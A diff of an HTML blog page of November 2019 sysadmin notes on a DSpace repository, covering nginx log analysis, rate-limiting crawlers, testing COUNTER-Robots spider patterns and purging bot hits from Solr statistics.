<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -139,7 +139,7 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
<p class="blog-post-meta">
<time datetime="2019-11-04T12:20:30+02:00">Mon Nov 04, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -152,22 +152,22 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre><ul>
<li>The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | awk '{print $6}' | sed 's/&quot;//' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | awk &#39;{print $6}&#39; | sed &#39;s/&#34;//&#39; | sort | uniq -c | sort -n
1 PUT
8 PROPFIND
283 OPTIONS
@ -177,31 +177,31 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</code></pre><ul>
<li>Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#39;(34\.224\.4\.16|34\.234\.204\.152)&#39;
365288
</code></pre><ul>
<li>Their user agent is one I&rsquo;ve never seen before:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)
</code></pre><ul>
<li>Most of them seem to be to community or collection discover and browse results pages like <code>/handle/10568/103/discover</code>:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -o -E &quot;GET /(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -o -E &#34;GET /(bitstream|discover|handle)&#34; | sort | uniq -c
6566 GET /bitstream
351928 GET /handle
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c discover
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c discover
214209
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c browse
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c browse
86874
</code></pre><ul>
<li>As far as I can tell, none of their requests are counted in the Solr statistics:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true&#39;
</code></pre><ul>
<li>Still, those requests are CPU intensive so I will add their user agent to the &ldquo;badbots&rdquo; rate limiting in nginx to reduce the impact on server load</li>
<li>After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:&quot;Amazonbot/0.1&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1/discover&#39; User-Agent:&#34;Amazonbot/0.1&#34;
</code></pre><ul>
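<li>A rough way to see how many of their requests are being denied after the change (a quick sketch, assuming the default combined log format where the status code is the ninth field):</li>
</ul>
<pre tabindex="0"><code># awk &#39;$9 == 503&#39; /var/log/nginx/access.log | grep -c Amazonbot
</code></pre><ul>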
<li>On the topic of spiders, I have been wanting to update DSpace&rsquo;s default list of spiders in <code>config/spiders/agents</code>, perhaps by dropping a new list in from <a href="https://github.com/atmire/COUNTER-Robots">Atmire&rsquo;s COUNTER-Robots</a> project
<ul>
@ -210,23 +210,23 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;iskanie&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;iskanie&#34;
</code></pre><ul>
<li>A bit later I checked Solr and found three requests from my IP with that user agent this month:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0'
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0&#39;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;1&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&quot;fq&quot;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;3&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;1&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;3&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>Now I want to make similar requests with a user agent that is included in DSpace&rsquo;s current user agent list:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;celestial&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;celestial&#34;
</code></pre><ul>
<li>After twenty minutes I didn&rsquo;t see any requests in Solr, so I assume they did not get logged because they matched a bot list&hellip;
<ul>
@ -234,7 +234,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
</ul>
</li>
</ul>
<pre><code>spider.agentregex.regexfile = ${dspace.dir}/config/spiders/Bots-2013-03.txt
<pre tabindex="0"><code>spider.agentregex.regexfile = ${dspace.dir}/config/spiders/Bots-2013-03.txt
</code></pre><ul>
<li>Apparently that is part of Atmire&rsquo;s CUA, despite being in a standard DSpace configuration file&hellip;</li>
<li>I tried with some other garbage user agents like &ldquo;fuuuualan&rdquo; and they were visible in Solr
@ -247,7 +247,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
</ul>
</li>
</ul>
<pre><code>else if (line.hasOption('m'))
<pre tabindex="0"><code>else if (line.hasOption(&#39;m&#39;))
{
SolrLogger.markRobotsByIP();
}
@ -263,34 +263,34 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
<ul>
<li>I added &ldquo;alanfuu2&rdquo; to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu1&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu2&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu1&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu2&#34;
</code></pre><ul>
<li>After committing the changes in Solr I saw one request for &ldquo;alanfuu1&rdquo; and no requests for &ldquo;alanfuu2&rdquo;:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>So basically it seems like a win to update the example file with the latest one from Atmire&rsquo;s COUNTER-Robots list
<ul>
<li>Even though the &ldquo;mark by user agent&rdquo; function is not working (see email to dspace-tech mailing list) DSpace will still not log Solr events from these user agents</li>
</ul>
</li>
<li>I&rsquo;m curious how the special character matching works in Solr, so I will test two requests: one with &ldquo;<a href="http://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="http://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
<li>I&rsquo;m curious how the special character matching works in Solr, so I will test two requests: one with &ldquo;<a href="https://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="https://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnip.com&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnyp.com&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnip.com&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnyp.com&#34;
</code></pre><ul>
<li>Then commit changes to Solr so we don&rsquo;t have to wait:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>So the blocking seems to be working because &ldquo;www.gnip.com&rdquo; is one of the new patterns added to the spiders file&hellip;</li>
</ul>
@ -314,24 +314,24 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.g
</ul>
</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;62944&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;62944&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Similar for com.plumanalytics, Grammarly, and ltx71!</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;28256&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;6288&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;105663&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;28256&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;6288&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;105663&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Deleting these seems to work, for example the 105,000 ltx71 records from 2018:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true'
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
<ul>
@ -341,21 +341,21 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
</ul>
</li>
</ul>
<pre><code>$ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*' | xmllint --format - | less
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*&#39; | xmllint --format - | less
...
&lt;lst name=&quot;facet_counts&quot;&gt;
&lt;lst name=&quot;facet_queries&quot;/&gt;
&lt;lst name=&quot;facet_fields&quot;&gt;
&lt;lst name=&quot;dateYearMonth&quot;&gt;
&lt;int name=&quot;2019-10&quot;&gt;198624&lt;/int&gt;
&lt;int name=&quot;2019-05&quot;&gt;88422&lt;/int&gt;
&lt;int name=&quot;2019-06&quot;&gt;79911&lt;/int&gt;
&lt;int name=&quot;2019-09&quot;&gt;67065&lt;/int&gt;
&lt;int name=&quot;2019-07&quot;&gt;39026&lt;/int&gt;
&lt;int name=&quot;2019-08&quot;&gt;36889&lt;/int&gt;
&lt;int name=&quot;2019-04&quot;&gt;36512&lt;/int&gt;
&lt;int name=&quot;2019-11&quot;&gt;760&lt;/int&gt;
&lt;lst name=&#34;facet_counts&#34;&gt;
&lt;lst name=&#34;facet_queries&#34;/&gt;
&lt;lst name=&#34;facet_fields&#34;&gt;
&lt;lst name=&#34;dateYearMonth&#34;&gt;
&lt;int name=&#34;2019-10&#34;&gt;198624&lt;/int&gt;
&lt;int name=&#34;2019-05&#34;&gt;88422&lt;/int&gt;
&lt;int name=&#34;2019-06&#34;&gt;79911&lt;/int&gt;
&lt;int name=&#34;2019-09&#34;&gt;67065&lt;/int&gt;
&lt;int name=&#34;2019-07&#34;&gt;39026&lt;/int&gt;
&lt;int name=&#34;2019-08&#34;&gt;36889&lt;/int&gt;
&lt;int name=&#34;2019-04&#34;&gt;36512&lt;/int&gt;
&lt;int name=&#34;2019-11&#34;&gt;760&lt;/int&gt;
&lt;/lst&gt;
&lt;/lst&gt;
</code></pre><ul>
@ -394,7 +394,7 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
</ul>
</li>
</ul>
<pre><code>$ for shard in statistics statistics-2018 statistics-2017 statistics-2016 statistics-2015 stat
<pre tabindex="0"><code>$ for shard in statistics statistics-2018 statistics-2017 statistics-2016 statistics-2015 stat
istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do ./check-spider-hits.sh -s $shard -p yes; done
</code></pre><ul>
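<li>The core of that script is just a loop over the agent patterns, doing a <code>rows=0</code> query against a core and printing the hit count; a simplified sketch (not the exact <code>check-spider-hits.sh</code>, and <code>/tmp/spider-agents.txt</code> is a hypothetical input file):</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env bash
# sketch: count Solr statistics hits for each spider user agent pattern
solr_url=&#34;http://localhost:8081/solr&#34;
shard=&#34;statistics&#34;
while read -r agent; do
    # rows=0 because we only need numFound, not the documents themselves
    numfound=$(curl -s &#34;$solr_url/$shard/select&#34; -d &#34;q=userAgent:*${agent}*&amp;rows=0&#34; \
        | xmllint --xpath &#39;string(//result/@numFound)&#39; -)
    [ &#34;${numfound:-0}&#34; -gt 0 ] &amp;&amp; echo &#34;$agent: $numfound hits in $shard&#34;
done &lt; /tmp/spider-agents.txt
</code></pre><ul>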
<li>Open a <a href="https://github.com/atmire/COUNTER-Robots/pull/28">pull request</a> against COUNTER-Robots to remove unnecessary escaping of dashes</li>
@ -423,17 +423,17 @@ istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do
</li>
<li>Testing modifying some of the COUNTER-Robots patterns to use <code>[0-9]</code> instead of <code>\d</code> digit character type, as Solr&rsquo;s regex search can&rsquo;t use those</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;Scrapoo/1&quot;
$ http &quot;http://localhost:8081/solr/statistics/update?commit=true&quot;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;Scrapoo/1&#34;
$ http &#34;http://localhost:8081/solr/statistics/update?commit=true&#34;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Nice, so searching with regex in Solr with <code>//</code> syntax works for those digits!</li>
<li>I realized that it&rsquo;s easier to search Solr from curl via POST using this syntax:</li>
</ul>
<pre><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:*Scrapoo*&amp;rows=0&quot;)
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:*Scrapoo*&amp;rows=0&#34;)
</code></pre><ul>
<li>If the parameters include something like &ldquo;[0-9]&rdquo; then curl interprets it as a range and will make ten requests
<ul>
@ -441,7 +441,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
</ul>
</li>
</ul>
<pre><code>$ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select&#39; -d &#39;q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2&#39;
</code></pre><ul>
<li>I updated the <code>check-spider-hits.sh</code> script to use the POST syntax, and I&rsquo;m evaluating the feasibility of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling</li>
</ul>
@ -450,7 +450,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -513,7 +513,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>Most of the curl hits were from CIAT in mid-2019, where they were using <a href="https://guzzle3.readthedocs.io/http-client/client.html">GuzzleHttp</a> from PHP, which uses something like this for its user agent:</li>
</ul>
<pre><code>Guzzle/&lt;Guzzle_Version&gt; curl/&lt;curl_version&gt; PHP/&lt;PHP_VERSION&gt;
<pre tabindex="0"><code>Guzzle/&lt;Guzzle_Version&gt; curl/&lt;curl_version&gt; PHP/&lt;PHP_VERSION&gt;
</code></pre><ul>
<li>Run system updates on DSpace Test and reboot the server</li>
</ul>
@ -564,7 +564,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>Buck is one I&rsquo;ve never heard of before, its user agent is:</li>
</ul>
<pre><code>Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)
<pre tabindex="0"><code>Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)
</code></pre><ul>
<li>All in all that&rsquo;s about 85,000 more hits purged, in addition to the 3.4 million I purged last week</li>
</ul>
@ -692,15 +692,15 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<ol class="list-unstyled">
